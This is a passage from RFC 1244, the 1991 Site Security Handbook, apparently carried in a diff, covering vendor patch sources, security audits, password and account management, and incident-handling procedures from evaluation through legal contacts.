other security holes that could affect their systems. + - Distributing the patch (or work-around) as quickly + as possible. + + + +Site Security Policy Handbook Working Group [Page 53] + +RFC 1244 Site Security Handbook July 1991 + + + They have created an electronic mail address, SECURITY- + ALERT@SUN.COM, which will enable customers to report security + problems. A voice-mail backup is available at (415) 688-9081. + A "Security Contact" can be designated by each customer site; + this person will be contacted by Sun in case of any new + security problems. For more information, contact your Sun + representative. + + 3.9.9.4 Trusted Archive Servers + + Several sites on the Internet maintain large repositories of + public-domain and freely distributable software, and make this + material available for anonymous FTP. This section describes + some of the larger repositories. Note that none of these + servers implements secure checksums or anything else + guaranteeing the integrity of their data. Thus, the notion of + "trust" should be taken as a somewhat limited definition. + + 3.9.9.4.1 Sun Fixes on UUNET + + Sun Microsystems has contracted with UUNET Communications + Services, Inc., to make fixes for bugs in Sun software + available via anonymous FTP. You can access these fixes by + using the "ftp" command to connect to the host FTP.UU.NET. + Then change into the directory "sun-dist/security", and + obtain a directory listing. The file "README" contains a + brief description of what each file in this directory + contains, and what is required to install the fix. + + 3.9.9.4.2 Berkeley Fixes + + The University of California at Berkeley also makes fixes + available via anonymous FTP; these fixes pertain primarily + to the current release of BSD UNIX (currently, release 4.3). + However, even if you are not running their software, these + fixes are still important, since many vendors (Sun, DEC, + Sequent, etc.) base their software on the Berkeley releases. + + The Berkeley fixes are available for anonymous FTP from the + host UCBARPA.BERKELEY.EDU in the directory "4.3/ucb-fixes". + The file "INDEX" in this directory describes what each file + contains. They are also available from UUNET (see section + 3.9.9.4.3). + + Berkeley also distributes new versions of "sendmail" and + "named" from this machine. New versions of these commands + are stored in the "4.3" directory, usually in the files + "sendmail.tar.Z" and "bind.tar.Z", respectively. + + + +Site Security Policy Handbook Working Group [Page 54] + +RFC 1244 Site Security Handbook July 1991 + + + 3.9.9.4.3 Simtel-20 and UUNET + + The two largest general-purpose software repositories on the + Internet are the hosts WSMR-SIMTEL20.ARMY.MIL and + FTP.UU.NET. + + WSMR-SIMTEL20.ARMY.MIL is a TOPS-20 machine operated by the + U.S. Army at White Sands Missile Range (WSMR), New Mexico. + The directory "pd2:" contains a large amount of UNIX + software, primarily taken from the "comp.sources" + newsgroups. The directories "pd1:" and + "pd2:" contains software for IBM PC systems, and + "pd3:" contains software for the Apple Macintosh. + + FTP.UU.NET is operated by UUNET Communications Services, + Inc. in Falls Church, Virginia. This company sells Internet + and USENET access to sites all over the country (and + internationally). The software posted to the following + USENET source newsgroups is stored here, in directories of + the same name: + + comp.sources.games + comp.sources.misc + comp.sources.sun + comp.sources.unix + comp.sources.x + + Numerous other distributions, such as all the freely + distributable Berkeley UNIX source code, Internet Request + for Comments (RFCs), and so on are also stored on this + system. + + 3.9.9.4.4 Vendors + + Many vendors make fixes for bugs in their software available + electronically, either via mailing lists or via anonymous + FTP. You should contact your vendor to find out if they + offer this service, and if so, how to access it. Some + vendors that offer these services include Sun Microsystems + (see above), Digital Equipment Corporation (DEC), the + University of California at Berkeley (see above), and Apple + Computer [5, CURRY]. + + + + + + + + + +Site Security Policy Handbook Working Group [Page 55] + +RFC 1244 Site Security Handbook July 1991 + + +4. Types of Security Procedures + +4.1 System Security Audits + + Most businesses undergo some sort of annual financial auditing as a + regular part of their business life. Security audits are an + important part of running any computing environment. Part of the + security audit should be a review of any policies that concern system + security, as well as the mechanisms that are put in place to enforce + them. + + 4.1.1 Organize Scheduled Drills + + Although not something that would be done each day or week, + scheduled drills may be conducted to determine if the procedures + defined are adequate for the threat to be countered. If your + major threat is one of natural disaster, then a drill would be + conducted to verify your backup and recovery mechanisms. On the + other hand, if your greatest threat is from external intruders + attempting to penetrate your system, a drill might be conducted to + actually try a penetration to observe the effect of the policies. + + Drills are a valuable way to test that your policies and + procedures are effective. On the other hand, drills can be time- + consuming and disruptive to normal operations. It is important to + weigh the benefits of the drills against the possible time loss + which may be associated with them. + + 4.1.2 Test Procedures + + If the choice is made to not to use scheduled drills to examine + your entire security procedure at one time, it is important to + test individual procedures frequently. Examine your backup + procedure to make sure you can recover data from the tapes. Check + log files to be sure that information which is supposed to be + logged to them is being logged to them, etc.. + + When a security audit is mandated, great care should be used in + devising tests of the security policy. It is important to clearly + identify what is being tested, how the test will be conducted, and + results expected from the test. This should all be documented and + included in or as an adjunct to the security policy document + itself. + + It is important to test all aspects of the security policy, both + procedural and automated, with a particular emphasis on the + automated mechanisms used to enforce the policy. Tests should be + defined to ensure a comprehensive examination of policy features, + + + +Site Security Policy Handbook Working Group [Page 56] + +RFC 1244 Site Security Handbook July 1991 + + + that is, if a test is defined to examine the user logon process, + it should be explicitly stated that both valid and invalid user + names and passwords will be used to demonstrate proper operation + of the logon program. + + Keep in mind that there is a limit to the reasonableness of tests. + The purpose of testing is to ensure confidence that the security + policy is being correctly enforced, and not to "prove" the + absoluteness of the system or policy. The goal should be to + obtain some assurance that the reasonable and credible controls + imposed by your security policy are adequate. + +4.2 Account Management Procedures + + Procedures to manage accounts are important in preventing + unauthorized access to your system. It is necessary to decide + several things: Who may have an account on the system? How long may + someone have an account without renewing his or her request? How do + old accounts get removed from the system? The answers to all these + questions should be explicitly set out in the policy. + + In addition to deciding who may use a system, it may be important to + determine what each user may use the system for (is personal use + allowed, for example). If you are connected to an outside network, + your site or the network management may have rules about what the + network may be used for. Therefore, it is important for any security + policy to define an adequate account management procedure for both + administrators and users. Typically, the system administrator would + be responsible for creating and deleting user accounts and generally + maintaining overall control of system use. To some degree, account + management is also the responsibility of each system user in the + sense that the user should observe any system messages and events + that may be indicative of a policy violation. For example, a message + at logon that indicates the date and time of the last logon should be + reported by the user if it indicates an unreasonable time of last + logon. + +4.3 Password Management Procedures + + A policy on password management may be important if your site wishes + to enforce secure passwords. These procedures may range from asking + or forcing users to change their passwords occasionally to actively + attempting to break users' passwords and then informing the user of + how easy it was to do. Another part of password management policy + covers who may distribute passwords - can users give their passwords + to other users? + + Section 2.3 discusses some of the policy issues that need to be + + + +Site Security Policy Handbook Working Group [Page 57] + +RFC 1244 Site Security Handbook July 1991 + + + decided for proper password management. Regardless of the policies, + password management procedures need to be carefully setup to avoid + disclosing passwords. The choice of initial passwords for accounts + is critical. In some cases, users may never login to activate an + account; thus, the choice of the initial password should not be + easily guessed. Default passwords should never be assigned to + accounts: always create new passwords for each user. If there are + any printed lists of passwords, these should be kept off-line in + secure locations; better yet, don't list passwords. + + 4.3.1 Password Selection + + Perhaps the most vulnerable part of any computer system is the + account password. Any computer system, no matter how secure it is + from network or dial-up attack, Trojan horse programs, and so on, + can be fully exploited by an intruder if he or she can gain access + via a poorly chosen password. It is important to define a good + set of rules for password selection, and distribute these rules to + all users. If possible, the software which sets user passwords + should be modified to enforce as many of the rules as possible. + + A sample set of guidelines for password selection is shown below: + + - DON'T use your login name in any form (as-is, + reversed, capitalized, doubled, etc.). + + - DON'T use your first, middle, or last name in any form. + + - DON'T use your spouse's or child's name. + + - DON'T use other information easily obtained about you. + This includes license plate numbers, telephone numbers, + social security numbers, the make of your automobile, + the name of the street you live on, etc.. + + - DON'T use a password of all digits, or all the same + letter. + + - DON'T use a word contained in English or foreign + language dictionaries, spelling lists, or other + lists of words. + + - DON'T use a password shorter than six characters. + + - DO use a password with mixed-case alphabetics. + + - DO use a password with non-alphabetic characters (digits + or punctuation). + + + +Site Security Policy Handbook Working Group [Page 58] + +RFC 1244 Site Security Handbook July 1991 + + + - DO use a password that is easy to remember, so you don't + have to write it down. + + - DO use a password that you can type quickly, without + having to look at the keyboard. + + Methods of selecting a password which adheres to these guidelines + include: + + - Choose a line or two from a song or poem, and use the + first letter of each word. + + - Alternate between one consonant and one or two vowels, up + to seven or eight characters. This provides nonsense + words which are usually pronounceable, and thus easily + remembered. + + - Choose two short words and concatenate them together with + a punctuation character between them. + + Users should also be told to change their password periodically, + usually every three to six months. This makes sure that an + intruder who has guessed a password will eventually lose access, + as well as invalidating any list of passwords he/she may have + obtained. Many systems enable the system administrator to force + users to change their passwords after an expiration period; this + software should be enabled if your system supports it [5, CURRY]. + + Some systems provide software which forces users to change their + passwords on a regular basis. Many of these systems also include + password generators which provide the user with a set of passwords + to choose from. The user is not permitted to make up his or her + own password. There are arguments both for and against systems + such as these. On the one hand, by using generated passwords, + users are prevented from selecting insecure passwords. On the + other hand, unless the generator is good at making up easy to + remember passwords, users will begin writing them down in order to + remember them. + + 4.3.2 Procedures for Changing Passwords + + How password changes are handled is important to keeping passwords + secure. Ideally, users should be able to change their own + passwords on-line. (Note that password changing programs are a + favorite target of intruders. See section 4.4 on configuration + management for further information.) + + However, there are exception cases which must be handled + + + +Site Security Policy Handbook Working Group [Page 59] + +RFC 1244 Site Security Handbook July 1991 + + + carefully. Users may forget passwords and not be able to get onto + the system. The standard procedure is to assign the user a new + password. Care should be taken to make sure that the real person + is requesting the change and gets the new password. One common + trick used by intruders is to call or message to a system + administrator and request a new password. Some external form of + verification should be used before the password is assigned. At + some sites, users are required to show up in person with ID. + + There may also be times when many passwords need to be changed. + If a system is compromised by an intruder, the intruder may be + able to steal a password file and take it off the system. Under + these circumstances, one course of action is to change all + passwords on the system. Your site should have procedures for how + this can be done quickly and efficiently. What course you choose + may depend on the urgency of the problem. In the case of a known + attack with damage, you may choose to forcibly disable all + accounts and assign users new passwords before they come back onto + the system. In some places, users are sent a message telling them + that they should change their passwords, perhaps within a certain + time period. If the password isn't changed before the time period + expires, the account is locked. + + Users should be aware of what the standard procedure is for + passwords when a security event has occurred. One well-known + spoof reported by the Computer Emergency Response Team (CERT) + involved messages sent to users, supposedly from local system + administrators, requesting them to immediately change their + password to a new value provided in the message [24]. These + messages were not from the administrators, but from intruders + trying to steal accounts. Users should be warned to immediately + report any suspicious requests such as this to site + administrators. + +4.4 Configuration Management Procedures + + Configuration management is generally applied to the software + development process. However, it is certainly applicable in a + operational sense as well. Consider that the since many of the + system level programs are intended to enforce the security policy, it + is important that these be "known" as correct. That is, one should + not allow system level programs (such as the operating system, etc.) + to be changed arbitrarily. At very least, the procedures should + state who is authorized to make changes to systems, under what + circumstances, and how the changes should be documented. + + In some environments, configuration management is also desirable as + applied to physical configuration of equipment. Maintaining valid + + + +Site Security Policy Handbook Working Group [Page 60] + +RFC 1244 Site Security Handbook July 1991 + + + and authorized hardware configuration should be given due + consideration in your security policy. + + 4.4.1 Non-Standard Configurations + + Occasionally, it may be beneficial to have a slightly non-standard + configuration in order to thwart the "standard" attacks used by + some intruders. The non-standard parts of the configuration might + include different password encryption algorithms, different + configuration file locations, and rewritten or functionally + limited system commands. + + Non-standard configurations, however, also have their drawbacks. + By changing the "standard" system, these modifications make + software maintenance more difficult by requiring extra + documentation to be written, software modification after operating + system upgrades, and, usually, someone with special knowledge of + the changes. + + Because of the drawbacks of non-standard configurations, they are + often only used in environments with a "firewall" machine (see + section 3.9.1). The firewall machine is modified in non-standard + ways since it is susceptible to attack, while internal systems + behind the firewall are left in their standard configurations. + +5. Incident Handling + +5.1 Overview + + This section of the document will supply some guidance to be applied + when a computer security event is in progress on a machine, network, + site, or multi-site environment. The operative philosophy in the + event of a breach of computer security, whether it be an external + intruder attack or a disgruntled employee, is to plan for adverse + events in advance. There is no substitute for creating contingency + plans for the types of events described above. + + Traditional computer security, while quite important in the overall + site security plan, usually falls heavily on protecting systems from + attack, and perhaps monitoring systems to detect attacks. Little + attention is usually paid for how to actually handle the attack when + it occurs. The result is that when an attack is in progress, many + decisions are made in haste and can be damaging to tracking down the + source of the incident, collecting evidence to be used in prosecution + efforts, preparing for the recovery of the system, and protecting the + valuable data contained on the system. + + + + + +Site Security Policy Handbook Working Group [Page 61] + +RFC 1244 Site Security Handbook July 1991 + + + 5.1.1 Have a Plan to Follow in Case of an Incident + + Part of handling an incident is being prepared to respond before + the incident occurs. This includes establishing a suitable level + of protections, so that if the incident becomes severe, the damage + which can occur is limited. Protection includes preparing + incident handling guidelines or a contingency response plan for + your organization or site. Having written plans eliminates much + of the ambiguity which occurs during an incident, and will lead to + a more appropriate and thorough set of responses. Second, part of + protection is preparing a method of notification, so you will know + who to call and the relevant phone numbers. It is important, for + example, to conduct "dry runs," in which your computer security + personnel, system administrators, and managers simulate handling + an incident. + + Learning to respond efficiently to an incident is important for + numerous reasons. The most important benefit is directly to human + beings--preventing loss of human life. Some computing systems are + life critical systems, systems on which human life depends (e.g., + by controlling some aspect of life-support in a hospital or + assisting air traffic controllers). + + An important but often overlooked benefit is an economic one. + Having both technical and managerial personnel respond to an + incident requires considerable resources, resources which could be + utilized more profitably if an incident did not require their + services. If these personnel are trained to handle an incident + efficiently, less of their time is required to deal with that + incident. + + A third benefit is protecting classified, sensitive, or + proprietary information. One of the major dangers of a computer + security incident is that information may be irrecoverable. + Efficient incident handling minimizes this danger. When + classified information is involved, other government regulations + may apply and must be integrated into any plan for incident + handling. + + A fourth benefit is related to public relations. News about + computer security incidents tends to be damaging to an + organization's stature among current or potential clients. + Efficient incident handling minimizes the potential for negative + exposure. + + A final benefit of efficient incident handling is related to legal + issues. It is possible that in the near future organizations may + be sued because one of their nodes was used to launch a network + + + +Site Security Policy Handbook Working Group [Page 62] + +RFC 1244 Site Security Handbook July 1991 + + + attack. In a similar vein, people who develop patches or + workarounds may be sued if the patches or workarounds are + ineffective, resulting in damage to systems, or if the patches or + workarounds themselves damage systems. Knowing about operating + system vulnerabilities and patterns of attacks and then taking + appropriate measures is critical to circumventing possible legal + problems. + + 5.1.2 Order of Discussion in this Session Suggests an Order for + a Plan + + This chapter is arranged such that a list may be generated from + the Table of Contents to provide a starting point for creating a + policy for handling ongoing incidents. The main points to be + included in a policy for handling incidents are: + + o Overview (what are the goals and objectives in handling the + incident). + o Evaluation (how serious is the incident). + o Notification (who should be notified about the incident). + o Response (what should the response to the incident be). + o Legal/Investigative (what are the legal and prosecutorial + implications of the incident). + o Documentation Logs (what records should be kept from before, + during, and after the incident). + + Each of these points is important in an overall plan for handling + incidents. The remainder of this chapter will detail the issues + involved in each of these topics, and provide some guidance as to + what should be included in a site policy for handling incidents. + + 5.1.3 Possible Goals and Incentives for Efficient Incident + Handling + + As in any set of pre-planned procedures, attention must be placed + on a set of goals to be obtained in handling an incident. These + goals will be placed in order of importance depending on the site, + but one such set of goals might be: + + Assure integrity of (life) critical systems. + Maintain and restore data. + Maintain and restore service. + Figure out how it happened. + Avoid escalation and further incidents. + Avoid negative publicity. + Find out who did it. + Punish the attackers. + + + + +Site Security Policy Handbook Working Group [Page 63] + +RFC 1244 Site Security Handbook July 1991 + + + It is important to prioritize actions to be taken during an + incident well in advance of the time an incident occurs. + Sometimes an incident may be so complex that it is impossible to + do everything at once to respond to it; priorities are essential. + Although priorities will vary from institution-to-institution, the + following suggested priorities serve as a starting point for + defining an organization's response: + + o Priority one -- protect human life and people's + safety; human life always has precedence over all + other considerations. + + o Priority two -- protect classified and/or sensitive + data (as regulated by your site or by government + regulations). + + o Priority three -- protect other data, including + proprietary, scientific, managerial and other data, + because loss of data is costly in terms of resources. + + o Priority four -- prevent damage to systems (e.g., loss + or alteration of system files, damage to disk drives, + etc.); damage to systems can result in costly down + time and recovery. + + o Priority five -- minimize disruption of computing + resources; it is better in many cases to shut a system + down or disconnect from a network than to risk damage + to data or systems. + + An important implication for defining priorities is that once + human life and national security considerations have been + addressed, it is generally more important to save data than system + software and hardware. Although it is undesirable to have any + damage or loss during an incident, systems can be replaced; the + loss or compromise of data (especially classified data), however, + is usually not an acceptable outcome under any circumstances. + + Part of handling an incident is being prepared to respond before + the incident occurs. This includes establishing a suitable level + of protections so that if the incident becomes severe, the damage + which can occur is limited. Protection includes preparing + incident handling guidelines or a contingency response plan for + your organization or site. Written plans eliminate much of the + ambiguity which occurs during an incident, and will lead to a more + appropriate and thorough set of responses. Second, part of + protection is preparing a method of notification so you will know + who to call and how to contact them. For example, every member of + + + +Site Security Policy Handbook Working Group [Page 64] + +RFC 1244 Site Security Handbook July 1991 + + + the Department of Energy's CIAC Team carries a card with every + other team member's work and home phone numbers, as well as pager + numbers. Third, your organization or site should establish backup + procedures for every machine and system. Having backups + eliminates much of the threat of even a severe incident, since + backups preclude serious data loss. Fourth, you should set up + secure systems. This involves eliminating vulnerabilities, + establishing an effective password policy, and other procedures, + all of which will be explained later in this document. Finally, + conducting training activities is part of protection. It is + important, for example, to conduct "dry runs," in which your + computer security personnel, system administrators, and managers + simulate handling an incident. + + 5.1.4 Local Policies and Regulations Providing Guidance + + Any plan for responding to security incidents should be guided by + local policies and regulations. Government and private sites that + deal with classified material have specific rules that they must + follow. + + The policies your site makes about how it responds to incidents + (as discussed in sections 2.4 and 2.5) will shape your response. + For example, it may make little sense to create mechanisms to + monitor and trace intruders if your site does not plan to take + action against the intruders if they are caught. Other + organizations may have policies that affect your plans. Telephone + companies often release information about telephone traces only to + law enforcement agencies. + + Section 5.5 also notes that if any legal action is planned, there + are specific guidelines that must be followed to make sure that + any information collected can be used as evidence. + +5.2 Evaluation + + 5.2.1 Is It Real? + + This stage involves determining the exact problem. Of course + many, if not most, signs often associated with virus infections, + system intrusions, etc., are simply anomalies such as hardware + failures. To assist in identifying whether there really is an + incident, it is usually helpful to obtain and use any detection + software which may be available. For example, widely available + software packages can greatly assist someone who thinks there may + be a virus in a Macintosh computer. Audit information is also + extremely useful, especially in determining whether there is a + network attack. It is extremely important to obtain a system + + + +Site Security Policy Handbook Working Group [Page 65] + +RFC 1244 Site Security Handbook July 1991 + + + snapshot as soon as one suspects that something is wrong. Many + incidents cause a dynamic chain of events to occur, and an initial + system snapshot may do more good in identifying the problem and + any source of attack than most other actions which can be taken at + this stage. Finally, it is important to start a log book. + Recording system events, telephone conversations, time stamps, + etc., can lead to a more rapid and systematic identification of + the problem, and is the basis for subsequent stages of incident + handling. + + There are certain indications or "symptoms" of an incident which + deserve special attention: + + o System crashes. + o New user accounts (e.g., the account RUMPLESTILTSKIN + has unexplainedly been created), or high activity on + an account that has had virtually no activity for + months. + o New files (usually with novel or strange file names, + such as data.xx or k). + o Accounting discrepancies (e.g., in a UNIX system you + might notice that the accounting file called + /usr/admin/lastlog has shrunk, something that should + make you very suspicious that there may be an + intruder). + o Changes in file lengths or dates (e.g., a user should + be suspicious if he/she observes that the .EXE files in + an MS DOS computer have unexplainedly grown + by over 1800 bytes). + o Attempts to write to system (e.g., a system manager + notices that a privileged user in a VMS system is + attempting to alter RIGHTSLIST.DAT). + o Data modification or deletion (e.g., files start to + disappear). + o Denial of service (e.g., a system manager and all + other users become locked out of a UNIX system, which + has been changed to single user mode). + o Unexplained, poor system performance (e.g., system + response time becomes unusually slow). + o Anomalies (e.g., "GOTCHA" is displayed on a display + terminal or there are frequent unexplained "beeps"). + o Suspicious probes (e.g., there are numerous + unsuccessful login attempts from another node). + o Suspicious browsing (e.g., someone becomes a root user + on a UNIX system and accesses file after file in one + user's account, then another's). + + None of these indications is absolute "proof" that an incident is + + + +Site Security Policy Handbook Working Group [Page 66] + +RFC 1244 Site Security Handbook July 1991 + + + occurring, nor are all of these indications normally observed when + an incident occurs. If you observe any of these indications, + however, it is important to suspect that an incident might be + occurring, and act accordingly. There is no formula for + determining with 100 percent accuracy that an incident is + occurring (possible exception: when a virus detection package + indicates that your machine has the nVIR virus and you confirm + this by examining contents of the nVIR resource in your Macintosh + computer, you can be very certain that your machine is infected). + It is best at this point to collaborate with other technical and + computer security personnel to make a decision as a group about + whether an incident is occurring. + + 5.2.2 Scope + + Along with the identification of the incident is the evaluation of + the scope and impact of the problem. It is important to correctly + identify the boundaries of the incident in order to effectively + deal with it. In addition, the impact of an incident will + determine its priority in allocating resources to deal with the + event. Without an indication of the scope and impact of the + event, it is difficult to determine a correct response. + + In order to identify the scope and impact, a set of criteria + should be defined which is appropriate to the site and to the type + of connections available. Some of the issues are: + + o Is this a multi-site incident? + o Are many computers at your site effected by this + incident? + o Is sensitive information involved? + o What is the entry point of the incident (network, + phone line, local terminal, etc.)? + o Is the press involved? + o What is the potential damage of the incident? + o What is the estimated time to close out the incident? + o What resources could be required + to handle the incident? + +5.3 Possible Types of Notification + + When you have confirmed that an incident is occurring, the + appropriate personnel must be notified. Who and how this + notification is achieved is very important in keeping the event under + control both from a technical and emotional standpoint. + + + + + + +Site Security Policy Handbook Working Group [Page 67] + +RFC 1244 Site Security Handbook July 1991 + + + 5.3.1 Explicit + + First of all, any notification to either local or off-site + personnel must be explicit. This requires that any statement (be + it an electronic mail message, phone call, or fax) provides + information about the incident that is clear, concise, and fully + qualified. When you are notifying others that will help you to + handle an event, a "smoke screen" will only divide the effort and + create confusion. If a division of labor is suggested, it is + helpful to provide information to each section about what is being + accomplished in other efforts. This will not only reduce + duplication of effort, but allow people working on parts of the + problem to know where to obtain other information that would help + them resolve a part of the incident. + + 5.3.2 Factual + + Another important consideration when communicating about the + incident is to be factual. Attempting to hide aspects of the + incident by providing false or incomplete information may not only + prevent a successful resolution to the incident, but may even + worsen the situation. This is especially true when the press is + involved. When an incident severe enough to gain press attention + is ongoing, it is likely that any false information you provide + will not be substantiated by other sources. This will reflect + badly on the site and may create enough ill-will between the site + and the press to damage the site's public relations. + + 5.3.3 Choice of Language + + The choice of language used when notifying people about the + incident can have a profound effect on the way that information is + received. When you use emotional or inflammatory terms, you raise + the expectations of damage and negative outcomes of the incident. + It is important to remain calm both in written and spoken + notifications. + + Another issue associated with the choice of language is the + notification to non-technical or off-site personnel. It is + important to accurately describe the incident without undue alarm + or confusing messages. While it is more difficult to describe the + incident to a non-technical audience, it is often more important. + A non-technical description may be required for upper-level + management, the press, or law enforcement liaisons. The + importance of these notifications cannot be underestimated and may + make the difference between handling the incident properly and + escalating to some higher level of damage. + + + + +Site Security Policy Handbook Working Group [Page 68] + +RFC 1244 Site Security Handbook July 1991 + + + 5.3.4 Notification of Individuals + + o Point of Contact (POC) people (Technical, Administrative, + Response Teams, Investigative, Legal, Vendors, Service + providers), and which POCs are visible to whom. + o Wider community (users). + o Other sites that might be affected. + + Finally, there is the question of who should be notified during + and after the incident. There are several classes of individuals + that need to be considered for notification. These are the + technical personnel, administration, appropriate response teams + (such as CERT or CIAC), law enforcement, vendors, and other + service providers. These issues are important for the central + point of contact, since that is the person responsible for the + actual notification of others (see section 5.3.6 for further + information). A list of people in each of these categories is an + important time saver for the POC during an incident. It is much + more difficult to find an appropriate person during an incident + when many urgent events are ongoing. + + In addition to the people responsible for handling part of the + incident, there may be other sites affected by the incident (or + perhaps simply at risk from the incident). A wider community of + users may also benefit from knowledge of the incident. Often, a + report of the incident once it is closed out is appropriate for + publication to the wider user community. + + 5.3.5 Public Relations - Press Releases + + One of the most important issues to consider is when, who, and how + much to release to the general public through the press. There + are many issues to consider when deciding this particular issue. + First and foremost, if a public relations office exists for the + site, it is important to use this office as liaison to the press. + The public relations office is trained in the type and wording of + information released, and will help to assure that the image of + the site is protected during and after the incident (if possible). + A public relations office has the advantage that you can + communicate candidly with them, and provide a buffer between the + constant press attention and the need of the POC to maintain + control over the incident. + + If a public relations office is not available, the information + released to the press must be carefully considered. If the + information is sensitive, it may be advantageous to provide only + minimal or overview information to the press. It is quite + possible that any information provided to the press will be + + + +Site Security Policy Handbook Working Group [Page 69] + +RFC 1244 Site Security Handbook July 1991 + + + quickly reviewed by the perpetrator of the incident. As a + contrast to this consideration, it was discussed above that + misleading the press can often backfire and cause more damage than + releasing sensitive information. + + While it is difficult to determine in advance what level of detail + to provide to the press, some guidelines to keep in mind are: + + o Keep the technical level of detail low. Detailed + information about the incident may provide enough + information for copy-cat events or even damage the + site's ability to prosecute once the event is over. + o Keep the speculation out of press statements. + Speculation of who is causing the incident or the + motives are very likely to be in error and may cause + an inflamed view of the incident. + o Work with law enforcement professionals to assure that + evidence is protected. If prosecution is involved, + assure that the evidence collected is not divulged to + the press. + o Try not to be forced into a press interview before you are + prepared. The popular press is famous for the "2am" + interview, where the hope is to catch the interviewee off + guard and obtain information otherwise not available. + o Do not allow the press attention to detract from the + handling of the event. Always remember that the successful + closure of an incident is of primary importance. + + 5.3.6 Who Needs to Get Involved? + + There now exists a number of incident response teams (IRTs) such + as the CERT and the CIAC. (See sections 3.9.7.3.1 and 3.9.7.3.4.) + Teams exists for many major government agencies and large + corporations. If such a team is available for your site, the + notification of this team should be of primary importance during + the early stages of an incident. These teams are responsible for + coordinating computer security incidents over a range of sites and + larger entities. Even if the incident is believed to be contained + to a single site, it is possible that the information available + through a response team could help in closing out the incident. + + In setting up a site policy for incident handling, it may be + desirable to create an incident handling team (IHT), much like + those teams that already exist, that will be responsible for + handling computer security incidents for the site (or + organization). If such a team is created, it is essential that + communication lines be opened between this team and other IHTs. + Once an incident is under way, it is difficult to open a trusted + + + +Site Security Policy Handbook Working Group [Page 70] + +RFC 1244 Site Security Handbook July 1991 + + + dialogue between other IHTs if none has existed before. + +5.4 Response + + A major topic still untouched here is how to actually respond to an + event. The response to an event will fall into the general + categories of containment, eradication, recovery, and follow-up. + + Containment + + The purpose of containment is to limit the extent of an attack. + For example, it is important to limit the spread of a worm attack + on a network as quickly as possible. An essential part of + containment is decision making (i.e., determining whether to shut + a system down, to disconnect from a network, to monitor system or + network activity, to set traps, to disable functions such as + remote file transfer on a UNIX system, etc.). Sometimes this + decision is trivial; shut the system down if the system is + classified or sensitive, or if proprietary information is at risk! + In other cases, it is worthwhile to risk having some damage to the + system if keeping the system up might enable you to identify an + intruder. + + The third stage, containment, should involve carrying out + predetermined procedures. Your organization or site should, for + example, define acceptable risks in dealing with an incident, and + should prescribe specific actions and strategies accordingly. + Finally, notification of cognizant authorities should occur during + this stage. + + Eradication + + Once an incident has been detected, it is important to first think + about containing the incident. Once the incident has been + contained, it is now time to eradicate the cause. Software may be + available to help you in this effort. For example, eradication + software is available to eliminate most viruses which infect small + systems. If any bogus files have been created, it is time to + delete them at this point. In the case of virus infections, it is + important to clean and reformat any disks containing infected + files. Finally, ensure that all backups are clean. Many systems + infected with viruses become periodically reinfected simply + because people do not systematically eradicate the virus from + backups. + + Recovery + + Once the cause of an incident has been eradicated, the recovery + + + +Site Security Policy Handbook Working Group [Page 71] + +RFC 1244 Site Security Handbook July 1991 + + + phase defines the next stage of action. The goal of recovery is + to return the system to normal. In the case of a network-based + attack, it is important to install patches for any operating + system vulnerability which was exploited. + + Follow-up + + One of the most important stages of responding to incidents is + also the most often omitted---the follow-up stage. This stage is + important because it helps those involved in handling the incident + develop a set of "lessons learned" (see section 6.3) to improve + future performance in such situations. This stage also provides + information which justifies an organization's computer security + effort to management, and yields information which may be + essential in legal proceedings. + + The most important element of the follow-up stage is performing a + postmortem analysis. Exactly what happened, and at what times? + How well did the staff involved with the incident perform? What + kind of information did the staff need quickly, and how could they + have gotten that information as soon as possible? What would the + staff do differently next time? A follow-up report is valuable + because it provides a reference to be used in case of other + similar incidents. Creating a formal chronology of events + (including time stamps) is also important for legal reasons. + Similarly, it is also important to as quickly obtain a monetary + estimate of the amount of damage the incident caused in terms of + any loss of software and files, hardware damage, and manpower + costs to restore altered files, reconfigure affected systems, and + so forth. This estimate may become the basis for subsequent + prosecution activity by the FBI, the U.S. Attorney General's + Office, etc.. + + 5.4.1 What Will You Do? + + o Restore control. + o Relation to policy. + o Which level of service is needed? + o Monitor activity. + o Constrain or shut down system. + + 5.4.2 Consider Designating a "Single Point of Contact" + + When an incident is under way, a major issue is deciding who is in + charge of coordinating the activity of the multitude of players. + A major mistake that can be made is to have a number of "points of + contact" (POC) that are not pulling their efforts together. This + will only add to the confusion of the event, and will probably + + + +Site Security Policy Handbook Working Group [Page 72] + +RFC 1244 Site Security Handbook July 1991 + + + lead to additional confusion and wasted or ineffective effort. + + The single point of contact may or may not be the person "in + charge" of the incident. There are two distinct rolls to fill + when deciding who shall be the point of contact and the person in + charge of the incident. The person in charge will make decisions + as to the interpretation of policy applied to the event. The + responsibility for the handling of the event falls onto this + person. In contrast, the point of contact must coordinate the + effort of all the parties involved with handling the event. + + The point of contact must be a person with the technical expertise + to successfully coordinate the effort of the system managers and + users involved in monitoring and reacting to the attack. Often + the management structure of a site is such that the administrator + of a set of resources is not a technically competent person with + regard to handling the details of the operations of the computers, + but is ultimately responsible for the use of these resources. + + Another important function of the POC is to maintain contact with + law enforcement and other external agencies (such as the CIA, DoD, + U.S. Army, or others) to assure that multi-agency involvement + occurs. + + Finally, if legal action in the form of prosecution is involved, + the POC may be able to speak for the site in court. The + alternative is to have multiple witnesses that will be hard to + coordinate in a legal sense, and will weaken any case against the + attackers. A single POC may also be the single person in charge + of evidence collected, which will keep the number of people + accounting for evidence to a minimum. As a rule of thumb, the + more people that touch a potential piece of evidence, the greater + the possibility that it will be inadmissible in court. The + section below (Legal/Investigative) will provide more details for + consideration on this topic. + +5.5 Legal/Investigative + + 5.5.1 Establishing Contacts with Investigative Agencies + + It is important to establish contacts with personnel from + investigative agencies such as the FBI and Secret Service as soon + as possible, for several reasons. Local law enforcement and local + security offices or campus police organizations should also be + informed when appropriate. A primary reason is that once a major + attack is in progress, there is little time to call various + personnel in these agencies to determine exactly who the correct + point of contact is. Another reason is that it is important to + + + +Site Security Policy Handbook Working Group [Page 73] + +RFC 1244 Site Security Handbook July 1991 + + + cooperate with these agencies in a manner that will foster a good + working relationship, and that will be in accordance with the + working procedures of these agencies. Knowing the working + procedures in advance and the expectations of your point of + contact is a big step in this direction. For example, it is + important to gather evidence that will be admissible in a court of + law. If you don't know in advance how to gather admissible + evidence, your efforts to collect evidence during an incident are + likely to be of no value to the investigative agency with which + you deal. A final reason for establishing contacts as soon as + possible is that it is impossible to know the particular agency + that will assume jurisdiction in any given incident. Making + contacts and finding the proper channels early will make + responding to an incident go considerably more smoothly. + + If your organization or site has a legal counsel, you need to + notify this office soon after you learn that an incident is in + progress. At a minimum, your legal counsel needs to be involved + to protect the legal and financial interests of your site or + organization. There are many legal and practical issues, a few of + which are: + + 1. Whether your site or 